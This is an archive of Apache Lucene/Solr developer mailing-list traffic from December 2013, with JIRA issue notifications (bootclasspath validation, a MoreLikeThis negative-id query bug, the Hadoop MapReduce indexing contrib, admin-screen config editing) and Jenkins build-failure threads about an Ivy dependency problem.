> on my Linux box, but specified {{-Dbootclasspath}} with shell specials (e.g., 
> {{~}} for homedir).
> This patch will assist the user and will "validate" the given bootclasspath, 
> so it points to a JAR file that actually contains the runtime. Also to make 
> life easier, instead of {{-Dbootclasspath}} you can set {{-Dbootjdk}} to the 
> JDK homefolder (same like JAVA_HOME) and ANT will figure out if it is Apple 
> or Oracle or maybe only a JRE.
> In the meantime, I regenerated the 4.6 Javadocs with correct bootclasspath.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Created] (LUCENE-5355) Add more support to validate the -Dbootclasspath given for javadocs generate

2013-12-02 Thread Uwe Schindler (JIRA)

Uwe Schindler created LUCENE-5355:
-

 Summary: Add more support to validate the -Dbootclasspath given 
for javadocs generate
 Key: LUCENE-5355
 URL: https://issues.apache.org/jira/browse/LUCENE-5355
 Project: Lucene - Core
  Issue Type: Improvement
  Components: general/build
Affects Versions: 4.6
 Environment: MacOSX AppleJDK6
Reporter: Uwe Schindler
 Fix For: 5.0, 4.7


When Simon created the nice looking javadocs for LuSolr 4.6, he just copypasted 
the command line from 
http://wiki.apache.org/lucene-java/HowToGenerateNiceJavadocs

Unfortunately this does not work with AppleJDK6, because it has no rt.jar! The 
rt.jar file is there in a completely different directory and is named 
classes.jar. I had a similar problem when I wanted to regenerate the Javadocs 
on my Linux box, but specified {{-Dbootclasspath}} with shell specials (e.g., 
{{~}} for homedir).

This patch will assist the user and will "validate" the given bootclasspath, so 
it points to a JAR file that actually contains the runtime. Also to make life 
easier, instead of {{-Dbootclasspath}} you can set {{-Dbootjdk}} to the JDK 
homefolder (same like JAVA_HOME) and ANT will figure out if it is Apple or 
Oracle or maybe only a JRE.

In the meantime, I regenerated the 4.6 Javadocs with correct bootclasspath.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5521) MoreLikeThis component fails when item id is negative (begins with hyphen)

2013-12-02 Thread Bill Mitchell (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5521?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836935#comment-13836935
 ] 

Bill Mitchell commented on SOLR-5521:
-

The fix that I will be testing is to go into TermQuery.toString and wrap 
term.text() with quotation marks if it begins with a hyphen.

> MoreLikeThis component fails when item id is negative (begins with hyphen)
> --
>
> Key: SOLR-5521
> URL: https://issues.apache.org/jira/browse/SOLR-5521
> Project: Solr
>  Issue Type: Bug
>  Components: MoreLikeThis
>Affects Versions: 4.2.1
>Reporter: Bill Mitchell
>Priority: Minor
>
> When the compared document's unique id is negative, the MoreLikeThis 
> component fails to generate a valid query to pass to each shard, as the 
> generated query does not encapsulate the item's negative id with quotes.  In 
> our case, we are adding documents with a negative id as temporary beans, used 
> just for the MLT query, which will be deleted later.
> You can see this with a rather simple MLT query:
> http://lga-sppsolrprod01.pulse.prod/solr/rawContents/select?mlt=true&q=itemId:-1578997856&mlt.fl=text&mlt.count=100
> where the returned response shows:
> 400 name="QTime">3100 name="mlt.fl">textitemId:-1578997856 name="mlt">true name="msg">org.apache.solr.search.SyntaxError: Cannot parse 
> 'itemId:-1578997856': Encountered " "-" "- "" at line 1, column 7.
> Was expecting one of:
>  ...
> "(" ...
> "*" ...
>  ...
>  ...
>  ...
>  ...
>  ...
> "[" ...
> "{" ...
>  ...
>  ...
> 400



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836934#comment-13836934
 ] 

Mark Miller commented on SOLR-1301:
---

I've setup a local jenkins job to run the two tests that have a problem with 
the test policy/manager. Next I'll file a JIRA issue for Yarn.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Created] (SOLR-5521) MoreLikeThis component fails when item id is negative (begins with hyphen)

2013-12-02 Thread Bill Mitchell (JIRA)

Bill Mitchell created SOLR-5521:
---

 Summary: MoreLikeThis component fails when item id is negative 
(begins with hyphen)
 Key: SOLR-5521
 URL: https://issues.apache.org/jira/browse/SOLR-5521
 Project: Solr
  Issue Type: Bug
  Components: MoreLikeThis
Affects Versions: 4.2.1
Reporter: Bill Mitchell
Priority: Minor


When the compared document's unique id is negative, the MoreLikeThis component 
fails to generate a valid query to pass to each shard, as the generated query 
does not encapsulate the item's negative id with quotes.  In our case, we are 
adding documents with a negative id as temporary beans, used just for the MLT 
query, which will be deleted later.

You can see this with a rather simple MLT query:
http://lga-sppsolrprod01.pulse.prod/solr/rawContents/select?mlt=true&q=itemId:-1578997856&mlt.fl=text&mlt.count=100

where the returned response shows:
4003100textitemId:-1578997856trueorg.apache.solr.search.SyntaxError: Cannot parse 
'itemId:-1578997856': Encountered " "-" "- "" at line 1, column 7.
Was expecting one of:
 ...
"(" ...
"*" ...
 ...
 ...
 ...
 ...
 ...
"[" ...
"{" ...
 ...
 ...
400



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller

Sorry - as Steve mentioned in IRC, you can also of course be more targeted and 
just remove the cache folder for the cdk-morphlines-core (com.cloudera.cdk) 
dependency.

- Mark

On Dec 2, 2013, at 4:01 PM, Mark Miller  wrote:

> If you are still having trouble after the latest commit, you may have to 
> remove your ~/.ivy cache and start fresh.
> 
> Ivy caching is funny and if you get a regular jar in the cache and then add 
> the def for the test jar for the dependency and resolve again, it will act as 
> if it already has the test version when it does not, just because it sees the 
> regular version.
> 
> - Mark
> 
> On Dec 2, 2013, at 3:35 PM, Mark Miller  wrote:
> 
>> When I clicked on the raw log, it stopped downloading the output in my 
>> browser at the clover task. Now it’s downloading it fully - figured it was a 
>> crash.
>> 
>> - Mark
>> 
>> On Dec 2, 2013, at 3:27 PM, Uwe Schindler  wrote:
>> 
>>> Maven Central does not have one of the crazy new jar files from cloudera.
>>> 
>>> It's not related to clover.
>>> 
>>> Uwe
>>> 
>>> 
>>> 
>>> Mark Miller  schrieb:
>>> Hmm…clover did not like something?
>>> 
>>> - Mark
>>> 
>>> On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server 
>>>  wrote:
>>> 
>>>  Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>>>  
>>>  No tests ran.
>>>  
>>>  Build Log:
>>>  [...truncated 13197 lines...]
>>>  BUILD FAILED
>>>  
>>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>>>  The following error occurred while executing this line:
>>>  
>>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98:
>>>  The following error occurred while executing this line:
>>>  
>>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
>>>  The following error occurred while executing this line:
>>> 
>>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>>>  The following error occurred while executing this line:
>>>  
>>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>>>  impossible to resolve dependencies:
>>>   resolve failed - see output for details
>>>  
>>>  Total time: 8 minutes 36 seconds
>>>  Build step 'Invoke Ant' marked build as failure
>>>  Archiving artifacts
>>>  Publishing Javadoc
>>>  Email was triggered for: Failure
>>>  Sending email for trigger: Failure
>>>  
>>>  
>>>  
>>> 
>>>  To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>>>  For additional commands, e-mail: dev-h...@lucene.apache.org
>>> 
>>> 
>>> 
>>> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>>> For additional commands, e-mail: dev-h...@lucene.apache.org
>>> 
>>> 
>>> --
>>> Uwe Schindler
>>> H.-H.-Meier-Allee 63, 28213 Bremen
>>> http://www.thetaphi.de
>> 
>

Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller

If you are still having trouble after the latest commit, you may have to remove 
your ~/.ivy cache and start fresh.

Ivy caching is funny and if you get a regular jar in the cache and then add the 
def for the test jar for the dependency and resolve again, it will act as if it 
already has the test version when it does not, just because it sees the regular 
version.

- Mark

On Dec 2, 2013, at 3:35 PM, Mark Miller  wrote:

> When I clicked on the raw log, it stopped downloading the output in my 
> browser at the clover task. Now it’s downloading it fully - figured it was a 
> crash.
> 
> - Mark
> 
> On Dec 2, 2013, at 3:27 PM, Uwe Schindler  wrote:
> 
>> Maven Central does not have one of the crazy new jar files from cloudera.
>> 
>> It's not related to clover.
>> 
>> Uwe
>> 
>> 
>> 
>> Mark Miller  schrieb:
>> Hmm…clover did not like something?
>> 
>> - Mark
>> 
>> On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server 
>>  wrote:
>> 
>>  Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>>  
>>  No tests ran.
>>  
>>  Build Log:
>>  [...truncated 13197 lines...]
>>  BUILD FAILED
>>  
>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>>  The following error occurred while executing this line:
>>  
>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: 
>> The following error occurred while executing this line:
>>  
>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
>>  The following error occurred while executing this line:
>> 
>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>>  The following error occurred while executing this line:
>>  
>> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>>  impossible to resolve dependencies:
>>   resolve failed - see output for details
>>  
>>  Total time: 8 minutes 36 seconds
>>  Build step 'Invoke Ant' marked build as failure
>>  Archiving artifacts
>>  Publishing Javadoc
>>  Email was triggered for: Failure
>>  Sending email for trigger: Failure
>>  
>>  
>>  
>> 
>>  To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>>  For additional commands, e-mail: dev-h...@lucene.apache.org
>> 
>> 
>> 
>> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>> For additional commands, e-mail: dev-h...@lucene.apache.org
>> 
>> 
>> --
>> Uwe Schindler
>> H.-H.-Meier-Allee 63, 28213 Bremen
>> http://www.thetaphi.de
>

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836909#comment-13836909
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547187 from [~markrmil...@gmail.com] in branch 'dev/trunk'
[ https://svn.apache.org/r1547187 ]

SOLR-1301: Ivy likes to act funny if you don't declare compile and test 
resources in the same dependency.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller

When I clicked on the raw log, it stopped downloading the output in my browser 
at the clover task. Now it’s downloading it fully - figured it was a crash.

- Mark

On Dec 2, 2013, at 3:27 PM, Uwe Schindler  wrote:

> Maven Central does not have one of the crazy new jar files from cloudera.
> 
> It's not related to clover.
> 
> Uwe
> 
> 
> 
> Mark Miller  schrieb:
> Hmm…clover did not like something?
> 
> - Mark
> 
> On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server  
> wrote:
> 
>  Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>  
>  No tests ran.
>  
>  Build Log:
>  [...truncated 13197 lines...]
>  BUILD FAILED
>  
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>  The following error occurred while executing this line:
>  /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: 
> The following error occurred while executing this line:
>  
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
>  The following error occurred while executing this line:
> 
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>  The following error occurred while executing this line:
>  
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>  impossible to resolve dependencies:
>   resolve failed - see output for details
>  
>  Total time: 8 minutes 36 seconds
>  Build step 'Invoke Ant' marked build as failure
>  Archiving artifacts
>  Publishing Javadoc
>  Email was triggered for: Failure
>  Sending email for trigger: Failure
>  
>  
>  
> 
>  To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>  For additional commands, e-mail: dev-h...@lucene.apache.org
> 
> 
> 
> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
> For additional commands, e-mail: dev-h...@lucene.apache.org
> 
> 
> --
> Uwe Schindler
> H.-H.-Meier-Allee 63, 28213 Bremen
> http://www.thetaphi.de

Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Uwe Schindler

Maven Central does not have one of the crazy new jar files from cloudera.

It's not related to clover.

Uwe



Mark Miller  schrieb:
>Hmm…clover did not like something?
>
>- Mark
>
>On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server
> wrote:
>
>> Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
>> 
>> No tests ran.
>> 
>> Build Log:
>> [...truncated 13197 lines...]
>> BUILD FAILED
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>The following error occurred while executing this line:
>>
>/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>impossible to resolve dependencies:
>>  resolve failed - see output for details
>> 
>> Total time: 8 minutes 36 seconds
>> Build step 'Invoke Ant' marked build as failure
>> Archiving artifacts
>> Publishing Javadoc
>> Email was triggered for: Failure
>> Sending email for trigger: Failure
>> 
>> 
>> 
>> -
>> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>> For additional commands, e-mail: dev-h...@lucene.apache.org
>
>
>-
>To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
>For additional commands, e-mail: dev-h...@lucene.apache.org

--
Uwe Schindler
H.-H.-Meier-Allee 63, 28213 Bremen
http://www.thetaphi.de

[JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8547 - Failure!

2013-12-02 Thread Policeman Jenkins Server

Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8547/
Java: 32bit/jdk1.8.0-ea-b117 -client -XX:+UseSerialGC

All tests passed

Build Log:
[...truncated 16441 lines...]
BUILD FAILED
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:420: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:400: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/build.xml:39: The following 
error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/extra-targets.xml:37: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/build.xml:209: The 
following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:441: 
The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/common-build.xml:491: 
The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-cell/build.xml:67:
 The following error occurred while executing this line:
/mnt/ssd/jenkins/workspace/Lucene-Solr-trunk-Linux/solr/contrib/solr-morphlines-core/build.xml:100:
 impossible to resolve dependencies:
resolve failed - see output for details

Total time: 51 minutes 54 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 32bit/jdk1.8.0-ea-b117 -client -XX:+UseSerialGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

Re: [JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Mark Miller

Hmm…clover did not like something?

- Mark

On Dec 2, 2013, at 3:01 PM, Apache Jenkins Server  
wrote:

> Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/
> 
> No tests ran.
> 
> Build Log:
> [...truncated 13197 lines...]
> BUILD FAILED
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
>  The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: 
> The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
>  The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>  The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>  impossible to resolve dependencies:
>   resolve failed - see output for details
> 
> Total time: 8 minutes 36 seconds
> Build step 'Invoke Ant' marked build as failure
> Archiving artifacts
> Publishing Javadoc
> Email was triggered for: Failure
> Sending email for trigger: Failure
> 
> 
> 
> -
> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
> For additional commands, e-mail: dev-h...@lucene.apache.org


-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Apache Jenkins Server

Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/

No tests ran.

Build Log:
[...truncated 13197 lines...]
BUILD FAILED
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: 
The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
 impossible to resolve dependencies:
resolve failed - see output for details

Total time: 8 minutes 36 seconds
Build step 'Invoke Ant' marked build as failure
Archiving artifacts
Publishing Javadoc
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Mark Miller (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836802#comment-13836802
 ] 

Mark Miller commented on SOLR-5287:
---

bq. It's the implementation of that feature in this issue that has exploits it 
should not have?

Yes.

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836768#comment-13836768
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547139 from [~markrmil...@gmail.com] in branch 'dev/trunk'
[ https://svn.apache.org/r1547139 ]

SOLR-1301: Add a Solr contrib that allows for building Solr indexes via 
Hadoop's MapReduce.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
